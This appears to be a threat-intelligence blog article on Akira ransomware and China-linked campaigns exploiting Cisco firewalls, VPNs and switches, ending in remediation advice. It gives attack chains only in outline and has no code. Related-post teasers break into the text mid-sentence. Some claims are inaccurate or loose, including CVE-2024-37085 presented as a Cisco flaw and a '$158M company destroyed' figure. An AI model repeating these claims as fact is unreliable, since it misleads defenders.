$244 Million in Ransoms, Chinese APT Groups, and Why Federal Agencies Can’t Keep Cisco Firewalls Patched

Executive Summary

While Fortinet and SonicWall have garnered attention for their exploitation crises, Cisco networking equipment—deployed in virtually every major enterprise, government agency, and critical infrastructure organization—has become ground zero for both Akira ransomware’s $244 million campaign and sophisticated Chinese nation-state espionage operations.

Marquis Ransomware Breach: When Third-Party Vendors Become the Weakest Link in Financial ServicesA comprehensive analysis of the August 2025 attack that exposed nearly 800,000 bank and credit union customers Executive Summary In August 2025, Marquis Software Solutions, a Texas-based financial technology vendor serving over 700 banks and credit unions, fell victim to a sophisticated ransomware attack that compromised the personal andBreached CompanyBreached Company The scale of the problem is staggering:

  • Approximately 48,000 unpatched Cisco ASA/FTD appliances remain internet-facing as of November 2025
  • Akira ransomware has specifically weaponized multiple Cisco CVEs for initial access
  • Chinese APT groups (UAT4356/Storm-1849) have been exploiting Cisco zero-days since 2024
  • Federal agencies themselves struggle to patch vulnerable Cisco devices, prompting emergency CISA directives
  • 60% of all cyber incidents in 2024 involved identity-based attacks exploiting VPN weaknesses—primarily Cisco products

This isn’t theoretical. The Congressional Budget Office was breached through unpatched Cisco firewalls during the 2025 government shutdown. KNP Logistics—a 158-year-old company—was destroyed when Akira ransomware exploited weak Cisco VPN credentials. The arcanedoor campaign deployed sophisticated persistent malware on Cisco ASA devices that survives reboots and upgrades.

The uncomfortable truth: Cisco’s ubiquity has made it the most valuable target in the ransomware ecosystem, and Akira has figured out exactly how to exploit it at scale.

The Akira-Cisco Connection: $244 Million and Counting

Akira’s Cisco-Focused Attack Strategy

Since emerging in March 2023, Akira ransomware has generated approximately $244.17 million in ransom proceeds as of September 2025, establishing itself as one of the most financially successful ransomware operations in history. What makes Akira particularly dangerous is its methodical targeting of Cisco products for initial access.

CISA’s November 2025 Updated Advisory specifically calls out Akira’s exploitation of multiple Cisco vulnerabilities:

Primary Cisco CVEs Exploited by Akira:

  • CVE-2020-3259 (CVSS 7.5) - Information disclosure in Cisco ASA/FTD
  • CVE-2023-20269 (CVSS 5.3) - Authentication bypass via alternate path
  • CVE-2020-3580 (CVSS 6.1) - Cross-site scripting in Cisco ASA/FTD
  • CVE-2024-37085 (CVSS 8.1) - Authentication bypass by primary weakness

The Attack Pattern:

  • Reconnaissance: Scan internet for exposed Cisco VPN endpoints
  • Initial Access: Exploit unpatched CVE or brute-force weak credentials
  • MFA Bypass: Use sophisticated VPN-specific techniques (push notification fatigue, session hijacking)
  • Privilege Escalation: Leverage Cisco-specific misconfigurations
  • Lateral Movement: Use RDP, AnyDesk, LogMeIn from compromised Cisco device
  • Data Exfiltration: Complete in as little as 2 hours from initial access
  • Encryption: Deploy Akira_v2 ransomware with .akira or .powerranges extension

Check Point’s Zero-Day Paradox: The Security Company That Couldn’t Secure ItselfHow the firm documenting 2025’s 47% attack surge became a victim of its own research—and why CVE-2024-24919 reveals systemic firewall vendor failures Executive Summary In a stunning display of irony, Check Point Software—the cybersecurity vendor that publishes the industry’s most comprehensive threat intelligence reports—suffered a critical zero-dayBreached CompanyBreached Company

Real-World Impact: The KNP Logistics Case Study

The June 2024 collapse of KNP Logistics perfectly illustrates Akira’s Cisco exploitation strategy:

Company Profile:

  • Founded: 1865 (158 years of continuous operation)
  • Industry: Transportation and logistics
  • Employees: 730 staff members
  • Status: One of the UK’s largest privately owned logistics groups

The CISO’s Nightmare Trifecta: When Data Centers, Vendor Risk Management, and Insider Threats CollideExecutive Summary Picture this: Your marketing team buys a SaaS tool. That tool runs on a third-party data center. The vendor’s employee—who has access to your OAuth tokens—gets phished. The attacker pivots to your Salesforce environment. They exfiltrate customer data and AWS credentials. They use those AWS credentialsSecurity Careers HelpSecurity Careers Attack Vector:

  • Akira exploited a weak password on a Cisco VPN account (no MFA enabled)
  • Brute-force attack successfully compromised employee credentials
  • Attackers gained access to Cisco ASA SSL VPN endpoint
  • Encrypted critical financial and operational systems

Outcome:

  • Company entered administration (British bankruptcy equivalent)
  • All 730 employees lost their jobs
  • 158-year-old business destroyed in weeks
  • Director Paul Abbott revealed he couldn’t inform the employee whose password was compromised: “Would you want to know if it was you?”

Preventable Factors:

  • No multi-factor authentication on VPN
  • Weak password policy
  • Unpatched Cisco ASA vulnerabilities
  • No network segmentation
  • Inadequate backup strategy

Financial Reality:

  • Recovery costs exceeded available resources
  • Loss of customer confidence prevented business continuity
  • Already challenging market conditions made recovery impossible

This case demonstrates that Akira specifically targets small-to-medium enterprises (SMEs) with Cisco equipment and weak security postures—organizations that lack enterprise-level security teams but still deploy enterprise-grade Cisco infrastructure.

Akira’s Targeting Profile

According to our analysis of October 2025 ransomware campaigns, Akira demonstrated clear victim preferences:

Industry Focus:

  • Construction (primary target) - 35% of October victims
  • Manufacturing - 28% of October victims
  • Critical Infrastructure - 15%
  • Education - 10%
  • Retail and Technology - 12%

Geographic Distribution:

  • United States - 70% of victims
  • Italy - 10% (unusually high concentration)
  • United Kingdom - 8%
  • Other - 12%

Company Size:

  • Mid-sized companies ($10M-$500M revenue)
  • 100-5,000 employees
  • Companies that “build or fix something”
  • Organizations with Cisco networking equipment (ASA/FTD/VPN)

The Retro Aesthetic: Akira distinguishes itself with a 1980s-style “green screen” console interface on its Tor-based leak site, paying homage to the 1988 anime movie “Akira.” Victims must interact with the site using text commands, creating an unsettling juxtaposition between nostalgia and modern criminality.

The Audacity Factor: In one documented negotiation, after settling for $200,000 from a $600,000 demand, Akira provided the victim with a security checklist—essentially offering “post-attack advice” on how not to get hacked again. This demonstrates the group’s confidence and their understanding that weak Cisco configurations will continue providing targets.

The Chinese Threat: ArcaneDoor and Beyond

ArcaneDoor: The Most Sophisticated Cisco Exploit Campaign

In early 2024, Cisco discovered what would become known as ArcaneDoor—a sophisticated espionage campaign targeting Cisco ASA and Firepower Threat Defense (FTD) devices. Unlike ransomware operations focused on quick monetization, ArcaneDoor represents nation-state level capabilities aimed at long-term persistent access.

Attribution:

  • UAT4356 (Cisco designation)
  • Storm-1849 (Microsoft designation)
  • High confidence attribution: China-linked threat actor

Exploited Zero-Days:

  • CVE-2024-20353 (CVSS 8.6) - Web Services Denial-of-Service
  • CVE-2024-20359 (CVSS 6.0) - Persistent Local Code Execution

Malware Implants:

Line Dancer (In-Memory Backdoor):

  • Resides entirely in memory (fileless)
  • Executes arbitrary shellcode payloads Capabilities:
  • Disable system logs to hide activity
  • Exfiltrate packet captures
  • Execute commands with root privileges
  • Evade detection by living in RAM only

Line Runner (Persistent HTTP-Based Lua Implant):

  • Installed by exploiting CVE-2024-20353 and CVE-2024-20359
  • Survives reboots and firmware upgrades
  • HTTP-based command and control
  • Written in Lua for portability
  • Provides persistent backdoor access even after patching

Attack Sophistication:

  • Attackers disable logging to hide their tracks
  • Intercept CLI commands to monitor administrator activity
  • Intentionally crash devices to prevent diagnostic analysis
  • Use advanced evasion techniques to avoid detection
  • Maintain access through multiple firmware versions

Timeline:

  • July 2023: UAT4356 begins preparations for campaign
  • Early January 2024: First intrusions detected by Cisco
  • April 24, 2024: Cisco publicly discloses ArcaneDoor
  • September 2025: Campaign continues with evolved techniques

September 2025: Continued Attacks Against Federal Agencies

The ArcaneDoor threat actor has not stopped. In September 2025, Cisco confirmed ongoing attacks exploiting new vulnerabilities:

CVE-2025-20333 (CVSS 9.9 - Critical):

  • Remote code execution
  • No authentication required
  • Affects Cisco ASA and FTD platforms

CVE-2025-20362 (CVSS 8.1 - High):

  • Authentication bypass
  • Allows unauthorized administrative access

CISA Emergency Directive 25-03 (Issued September 25, 2025):

  • Ordered all federal civilian agencies to immediately address vulnerabilities
  • Required agencies to report patching status
  • Shortest timeline in CISA emergency directive history

The Federal Patching Failure: In November 2025, CISA issued a stunning follow-up warning: Federal agencies were not patching vulnerable Cisco devices sufficiently.

CISA’s analysis revealed that devices marked as “patched” in agency reports were actually updated to software versions that were still vulnerable. This represents a catastrophic breakdown in federal cybersecurity operations—agencies thought they had patched but actually remained exposed.

Exploitation Activity:

Palo Alto Networks Unit 42 observed scanning/exploitation targeting:

  • 12 IP addresses at federal agencies
  • 11 IP addresses at state/local government
  • Government IPs in: India, Nigeria, Japan, Norway, France, UK, Netherlands, Spain, Australia, Poland, Austria, UAE, Azerbaijan, Bhutan

The Scale:

  • Approximately 48,000 unpatched Cisco ASA/FTD appliances remain internet-facing
  • Active exploitation confirmed within days of patch releases
  • State-sponsored attackers have months of head start due to federal patching failures

The Congressional Budget Office Breach

Perhaps the most embarrassing Cisco-related breach occurred at the Congressional Budget Office during the 2025 government shutdown.

Timeline:

  • October 2024: Critical Cisco firewall vulnerabilities discovered
  • October 1, 2025: Federal government shutdown begins, furloughing 2/3 of CISA staff
  • October 2025: CBO Cisco ASA firewall remains unpatched since 2024
  • Late October 2025: Chinese APT groups breach CBO through unpatched Cisco firewall
  • November 2025: Breach discovered, warnings issued to congressional staff

Key Details:

  • Security researcher Kevin Beaumont identified the CBO was running an ancient, unpatched Cisco ASA firewall
  • The firewall had known critical vulnerabilities
  • Government shutdown suspended routine patching and maintenance
  • Suspected Chinese government hackers exploited the unpatched system
  • CBO stated they “took immediate action to contain” but warnings suggest containment remains incomplete

Why This Matters:

  • The Congressional Budget Office analyzes federal budgets and economic impacts Compromise provides insight into:

  • US budget priorities

  • Defense spending plans

  • Economic forecasting

  • Legislative strategies

  • Demonstrates that even Congress itself cannot keep Cisco devices patched

Operation Zero Disco: SNMP Rootkit Campaign

In October 2025, Trend Micro uncovered Operation Zero Disco—an active campaign exploiting Cisco SNMP vulnerabilities to deploy Linux rootkits.

CVE-2025-20352 (Critical):

  • Affects Cisco 9400, 9300, and legacy 3750G series switches
  • Remote code execution via SNMP exploitation
  • Both 32-bit and 64-bit builds affected

Attack Technique:

  • Exploit Cisco SNMP vulnerability
  • Deploy Linux rootkit onto switch
  • Set universal password containing the word “disco” (one-letter change from “cisco”)
  • Install hooks into IOSd memory space
  • Enable fileless malware that disappears after reboot
  • Maintain persistent unauthorized access

Evasion Mechanisms:

  • Attackers use spoofed IPs and MAC addresses
  • Newer switches have ASLR which reduces success rate
  • Repeated attempts eventually succeed
  • Telnet vulnerability (modified CVE-2017-3881) used to enable memory access

Impacted Devices:

  • Cisco Catalyst 9400 Series
  • Cisco Catalyst 9300 Series
  • Cisco Catalyst 3750G Series (legacy, no longer supported)

Why “Disco”? Trend Research believes the universal password containing “disco” is a one-letter mockery of “cisco”—the attackers are quite literally taunting the vendor while compromising their devices.

Cisco’s Identity Crisis: 60% of 2024 Breaches

The Shift from Exploitation to Valid Credentials

According to Cisco Talos’s 2024 Year in Review, the cybersecurity landscape has fundamentally shifted:

60% of all cyber incidents in 2024 involved identity-based attacks.

What This Means:

  • Attackers are no longer relying primarily on exploiting software vulnerabilities
  • Instead, they’re using valid credentials to log in legitimately
  • Cisco VPN devices (ASA, FTD, AnyConnect) are primary targets
  • Once attackers have valid credentials, they appear as legitimate users

Attack Phases Using Identity:

  • Initial Access (69% of ransomware attacks) - Stolen credentials
  • Privilege Escalation - Legitimate elevation using compromised admin accounts
  • Lateral Movement - Moving between systems as authenticated user
  • Persistence - Creating additional legitimate accounts

Targeted Systems:

  • Active Directory - 44% of identity-based incidents
  • Cloud APIs - 20% of identity-related compromises
  • VPN Services - Cisco ASA, FTD, AnyConnect primary vectors

How Credentials Are Stolen:

  • Infostealers (84% increase in 2024)
  • Phishing campaigns targeting VPN users
  • Brute-force attacks against exposed VPN endpoints
  • MFA fatigue (push notification bombardment)
  • Initial Access Brokers selling pre-compromised credentials

The Cisco Connection: Cisco VPN products (ASA SSL VPN, AnyConnect) are deployed at virtually every major organization. When Akira or other ransomware groups target “VPN services without MFA,” they’re almost always talking about Cisco products.

The 2022 Cisco Corporate Breach: A Case Study

In May 2022, Cisco itself was breached—ironically demonstrating the very identity-based attack vectors that would plague their customers.

Attackers:

  • UNC2447 cybercrime gang
  • Lapsus$ threat actor group
  • Yanluowang ransomware operators

Attack Vector:

  • Attacker gained control of Cisco employee’s personal Google account
  • Employee had saved work credentials in browser that synced to Google
  • Attacker conducted sophisticated voice phishing (vishing)
  • Impersonated “trusted organizations” to trick employee
  • Performed MFA push notification fatigue attack
  • Employee eventually accepted MFA push, granting VPN access
  • Attackers accessed Cisco’s internal network using legitimate credentials

Post-Compromise Activity:

  • Privilege escalation using offensive security tools (Mimikatz, Cobalt Strike)
  • Added backdoor accounts with administrative privileges
  • Installed persistence mechanisms
  • Gained access to credential databases and registry
  • Cleared system logs to hide tracks
  • Dropped backdoor payload communicating with C2 server

Outcome:

  • Attackers failed to deploy ransomware
  • Managed to exfiltrate 2.75 GB (3,100 files)
  • Yanluowang published stolen files on dark web
  • No impact to Cisco products or customer data (per Cisco)
  • Demonstrated that even Cisco struggles with identity-based attacks on their own infrastructure

Cisco’s CISA KEV Problem: How Many is Too Many?

While Fortinet has 20 CVEs and SonicWall has 14 on CISA’s Known Exploited Vulnerabilities catalog, Cisco has multiple entries with new ones added regularly throughout 2024-2025.

Recent CISA KEV Additions:

2024 Major Additions

CVE-2024-20353 & CVE-2024-20359 (ArcaneDoor Campaign):

  • Added: April 24, 2024
  • Deadline: May 1, 2024
  • Context: Nation-state espionage campaign
  • Malware: Line Dancer, Line Runner
  • Impact: Persistent access surviving patches

CVE-2020-3259 (Akira Ransomware Exploitation):

  • Added: February 2024
  • Patched: May 2020 (4 years before KEV addition!)
  • Deadline: March 7, 2024
  • Context: Akira specifically targeting this CVE
  • Demonstrates attackers exploit old, unpatched vulnerabilities

CVE-2023-20269 (Akira Authentication Bypass):

  • Added: 2024
  • CVSS: 5.3
  • Context: Authentication bypass via alternate path
  • Used by Akira for initial VPN access

CVE-2024-20439 & CVE-2024-20440 (Smart Licensing Utility):

  • Added: March 31, 2025
  • CVSS: 9.8 (both Critical)
  • Deadline: April 21, 2025
  • Impact: Static administrative credential backdoor
  • Security researcher called it a “backdoor” Cisco intentionally creates
  • Exploitation attempts detected since January 2025

2025 Major Additions

CVE-2025-20333 & CVE-2025-20362 (Continued ArcaneDoor):

  • Added: September 25, 2025 (Emergency Directive 25-03)
  • CVSS: 9.9 and 8.1
  • Context: Same threat actor as ArcaneDoor
  • Federal agencies failed to patch properly
  • 48,000+ devices still vulnerable

CVE-2025-20352 (Operation Zero Disco):

  • Added: October 2025
  • Context: SNMP rootkit deployment
  • “Disco” password mockery
  • Affects major switch series

CVE-2020-3580 (Added to Akira Advisory):

  • Added to CISA Akira advisory: November 2025
  • CVSS: 6.1
  • Context: XSS in Cisco ASA/FTD
  • Akira using for initial access

CVE-2024-37085 (Akira Authentication Bypass):

  • Added to CISA Akira advisory: November 2025
  • CVSS: 8.1
  • Context: Authentication bypass by primary weakness
  • Recent addition to Akira’s arsenal

Additional Akira-Exploited CVEs (Not Cisco, But Relevant)

CVE-2024-40711 (Veeam Backup & Replication):

  • Akira and Fog ransomware actively exploit
  • Used after Cisco VPN compromise for privilege escalation
  • CISA confirmed used in ransomware campaigns

The Pattern: Why Cisco Keeps Getting Hit

1. Ubiquity = Maximum Attack Surface

Cisco holds dominant market share across enterprise networking:

  • Cisco ASA: ~40% of firewall market
  • Cisco AnyConnect VPN: Deployed at majority of Fortune 500
  • Cisco Switches/Routers: Backbone of internet infrastructure
  • Government Deployments: Standard issue for federal/state/local

Translation: Every ransomware group and nation-state actor has invested in developing Cisco exploits because compromising Cisco = compromising everything.

2. Legacy Equipment Still Running

Organizations continue running End-of-Life (EOL) Cisco equipment:

  • Cisco ASA 5500-X Series: Various models EOL between 2025-2026
  • Cisco Catalyst 3750G: No longer supported, still deployed
  • Ancient firmware versions: Organizations run years-old code

KNP Logistics ran unpatched Cisco ASA. Congressional Budget Office ran unpatched Cisco ASA since 2024. Pattern recognition is not difficult here.

3. Complexity Beyond Patching

Cisco devices require more than just applying patches:

  • Configuration hardening (disable Smart Install, Guest Shell, etc.)
  • Access control lists properly configured
  • SNMP community string rotation
  • TACACS+/RADIUS proper implementation
  • Management interface segmentation

Reality: Most organizations apply patches and call it done, leaving misconfigurations that attackers exploit.

4. The MFA Gap

Despite widespread MFA adoption, Cisco VPN deployments frequently lack proper MFA:

  • Legacy ASA/AnyConnect implementations without MFA
  • Push notification fatigue (attackers spam MFA requests until user accepts)
  • SMS-based MFA (vulnerable to SIM swapping)
  • Shared credentials across teams without proper RBAC

Akira specifically targets VPN services without MFA—which in practice means poorly configured Cisco VPN deployments.

5. The Zero-Day Problem

Cisco products are attractive targets for zero-day development:

  • ArcaneDoor used zero-days before patches existed
  • Operation Zero Disco exploited newly discovered SNMP vulnerabilities
  • Smart Licensing Utility had “backdoor” static credentials
  • Post-patch persistence techniques bypass remediation

Even patched systems can remain compromised if attackers achieved access before patching.

6. The Federal Government Can’t Keep Up

If CISA—the agency responsible for federal cybersecurity—issues an emergency directive and then discovers federal agencies failed to patch properly, what hope do SMBs have?

The Patching Crisis:

  • Government shutdown suspends patching operations
  • Agencies mark devices as “patched” when they’re not
  • 48,000 unpatched Cisco devices remain internet-facing
  • Chinese APT groups have months to exploit before remediation

What Organizations Must Do Now

Immediate Actions (This Week)

1. Emergency Cisco Device Inventory

Identify ALL Cisco networking equipment:

  • ASA firewalls
  • FTD appliances
  • AnyConnect VPN
  • Catalyst switches (especially 9400, 9300, 3750G)
  • Routers
  • Smart Licensing Utility installations

2. Critical Vulnerability Assessment Cross-reference your equipment against actively exploited CVEs:

  • ArcaneDoor: CVE-2024-20353, CVE-2024-20359, CVE-2025-20333, CVE-2025-20362
  • Akira Ransomware: CVE-2020-3259, CVE-2023-20269, CVE-2020-3580, CVE-2024-37085
  • Operation Zero Disco: CVE-2025-20352
  • Smart Licensing: CVE-2024-20439, CVE-2024-20440

3. Patch or Isolate

  • Apply all available Cisco security updates immediately
  • For EOL equipment: Retire and replace (no patches available)
  • For equipment that cannot be patched immediately: Isolate from internet
  • Remove internet-facing management interfaces

4. Mandatory MFA Enforcement

  • Enable MFA on ALL Cisco VPN access (ASA, AnyConnect)
  • Use phishing-resistant MFA (FIDO2, hardware tokens)
  • Eliminate SMS-based MFA
  • Implement MFA fatigue protections

5. Credential Rotation

  • Rotate all administrative credentials on Cisco devices
  • Change SNMP community strings
  • Update TACACS+/RADIUS shared secrets
  • Assume credentials have been compromised if devices were exposed

Short-Term Actions (This Month)

6. Configuration Hardening Review and implement Cisco hardening guides:

  • Disable Cisco Smart Install feature
  • Disable Guest Shell (IOS XE)
  • Restrict VTY access (management interfaces)
  • Configure access control lists with explicit deny logging
  • Disable outbound connections from VTYs
  • Use Type 8 (PBKDF2-SHA-256) for credential storage

7. Detection and Monitoring

Deploy network detection tools looking for:

  • Unusual SNMP activity

  • Packet capture creation on devices

  • SPAN/ERSPAN session definitions

  • FTP/SFTP transfers from network devices

  • Changes to VTY access configuration

  • Monitor for ArcaneDoor indicators (Line Dancer, Line Runner)

  • Alert on creation of unexpected administrative accounts

8. Incident Response Preparation

  • Assume your Cisco devices may already be compromised Run Cisco integrity verification tools:

  • Cisco Trust Anchor verification

  • ROMMON integrity checks

  • File system audits

  • Engage forensics team if suspicious activity found

  • Prepare for potential device rebuild/replacement

Long-Term Strategy

9. Architecture Redesign

  • Implement Zero Trust Network Access (ZTNA)
  • Eliminate reliance on perimeter-based VPN
  • Deploy Software-Defined Perimeter (SDP)
  • Segment networks to limit lateral movement
  • Consider moving to cloud-delivered security services

10. Vendor Diversification

  • Evaluate dependency on single vendor (Cisco)
  • Consider multi-vendor strategy for critical infrastructure
  • Balance: Vendor expertise vs. monoculture risk
  • Reality check: If Akira has weaponized your entire infrastructure, is diversification prudent?

11. Threat Intelligence Integration Subscribe to and act on:

  • Cisco PSIRT advisories
  • CISA KEV catalog updates
  • Threat intelligence on Akira and other groups
  • GreyNoise scanning activity reports
  • Monitor for Cisco exploitation campaigns

12. Staffing and Training

  • Hire or contract Cisco security specialists Train existing staff on:

  • Cisco hardening best practices

  • Incident response for network device compromise

  • ArcaneDoor/Akira TTPs

  • Tabletop exercises for Cisco device compromise scenarios

13. Board-Level Accountability Present to executive leadership and board:

  • Current Cisco device inventory and patch status
  • Exposure to Akira ransomware exploitation
  • Federal government’s patching failures (demonstrate even feds struggle)
  • Financial impact: $244M to Akira, $158M company destroyed (KNP)
  • Request adequate budget for remediation, staff, tools

The Uncomfortable Questions

1. When a networking vendor has products specifically targeted by a $244 million ransomware operation, at what point does continuing to deploy their equipment become negligent?

2. If the Congressional Budget Office—with direct access to CISA expertise—can’t keep Cisco firewalls patched, how can we expect small businesses to do so?

3. When Chinese nation-state actors develop malware (Line Runner) that survives firmware upgrades and reboots on Cisco devices, what is the actual remediation strategy?

4. If 60% of cyber incidents in 2024 involved identity-based attacks, and Cisco VPNs are the primary vector, why are we still deploying perimeter-based VPN architectures?

5. When attackers can deploy a “disco” password and gain universal access to Cisco switches via SNMP, why do we trust SNMP to be enabled at all?

6. If Akira specifically provides victims with security checklists after attacks, doesn’t that demonstrate they know their playbook (exploit Cisco) will continue working indefinitely?

7. When federal agencies marked devices as “patched” but were actually running vulnerable software, what does that say about the entire patch management industry?

8. If Operation Zero Disco attackers are mocking Cisco by using “disco” as a password, doesn’t that suggest deep familiarity with and contempt for Cisco’s security practices?

These aren’t rhetorical. They’re the questions auditors, regulators, and plaintiff attorneys will ask after your breach.

Lessons from the Firewall Triad: Cisco, Fortinet, SonicWall

We’ve now analyzed three major firewall vendors experiencing active exploitation:

SonicWall: 14 CVEs on CISA KEV, Akira exploitation, Marquis breach (788,000 victims)

Fortinet: 20 CVEs on CISA KEV, Qilin/Mora_001 exploitation, healthcare devastation

Cisco: Multiple CVEs on CISA KEV, Akira’s $244M campaign, ArcaneDoor nation-state malware

The Common Threads:

All three are being actively exploited by ransomware groups

  • SonicWall → Akira, Fog
  • Fortinet → Qilin, Mora_001/SuperBlack
  • Cisco → Akira (primary), various others

All three have post-patch persistence problems

  • SonicWall → Stolen credentials, OTP seeds
  • Fortinet → Symlink-based persistence (14,000+ devices)
  • Cisco → Line Runner survives upgrades, “disco” rootkits

All three are targets of Chinese nation-state actors

  • Multiple APT groups targeting all three vendors
  • Focus on long-term espionage vs. ransomware monetization
  • Sophisticated zero-day development

All three demonstrate massive patching failures

  • Organizations running years-old vulnerable firmware
  • Even federal agencies fail to patch properly
  • Patch management complexity exceeds organizational capabilities

All three have created vendor monocultures

  • Organizations deploy single vendor across entire infrastructure
  • Compromise of perimeter device = compromise of everything
  • Vendor-specific expertise required, limiting hiring pool

The Difference:

Cisco is worse because of its ubiquity. When Akira says “we exploit VPN services,” they mean Cisco. When the Congressional Budget Office gets breached, it’s Cisco. When a 158-year-old company is destroyed by a weak password, it’s a Cisco VPN.

Cisco isn’t just another firewall vendor experiencing exploitation—Cisco is the primary attack surface of the modern internet.

Conclusion: America’s Critical Infrastructure Runs on Compromised Cisco Equipment

The evidence is overwhelming:

  • $244 million in Akira ransoms, primarily via Cisco exploitation
  • 48,000 unpatched Cisco devices remain internet-facing
  • Federal agencies themselves cannot keep Cisco equipment secure
  • Nation-state actors have persistent access via Line Runner and other implants
  • 60% of breaches involve identity attacks, primarily targeting Cisco VPNs
  • KNP Logistics destroyed after 158 years due to Cisco VPN compromise
  • Congressional Budget Office breached via unpatched Cisco firewall

The uncomfortable reality: Cisco’s market dominance has created a single point of failure for critical infrastructure globally, and sophisticated threat actors have figured out how to exploit it at scale.

For organizations still running Cisco equipment (which is nearly everyone), the path forward is clear:

  • Assume your Cisco devices are compromised and conduct thorough forensic analysis
  • Patch immediately or isolate from internet if patching is impossible
  • Implement defense-in-depth because Cisco perimeter alone cannot protect you
  • Move to Zero Trust architecture eliminating reliance on VPN
  • Consider vendor diversification to reduce monoculture risk

For CISOs and boards, the KNP Logistics example should be seared into your memory: A 158-year-old company, 730 jobs, destroyed in weeks because of a weak password on a Cisco VPN.

The next victim won’t be asking “how did this happen?” They’ll be asking “why didn’t we act when we knew Cisco was being actively exploited by Akira?”

Don’t let your organization become another case study in preventable disaster.

Akira Ransomware Campaign Analysis:

Cisco Exploitation & Government Breaches:

Parallel Firewall Exploitation Analysis:

Identity-Based Attack Trends:

  • Cisco Talos 2024 Year in Review - 60% of incidents involved identity attacks
  • CISA KEV Catalog - Current list of Cisco exploited vulnerabilities

External Resources:

Analysis conducted December 2025. Based on CISA advisories, Cisco PSIRT bulletins, threat intelligence reports, and documented breach case studies. Organizations should consult with security professionals and legal counsel regarding remediation strategies.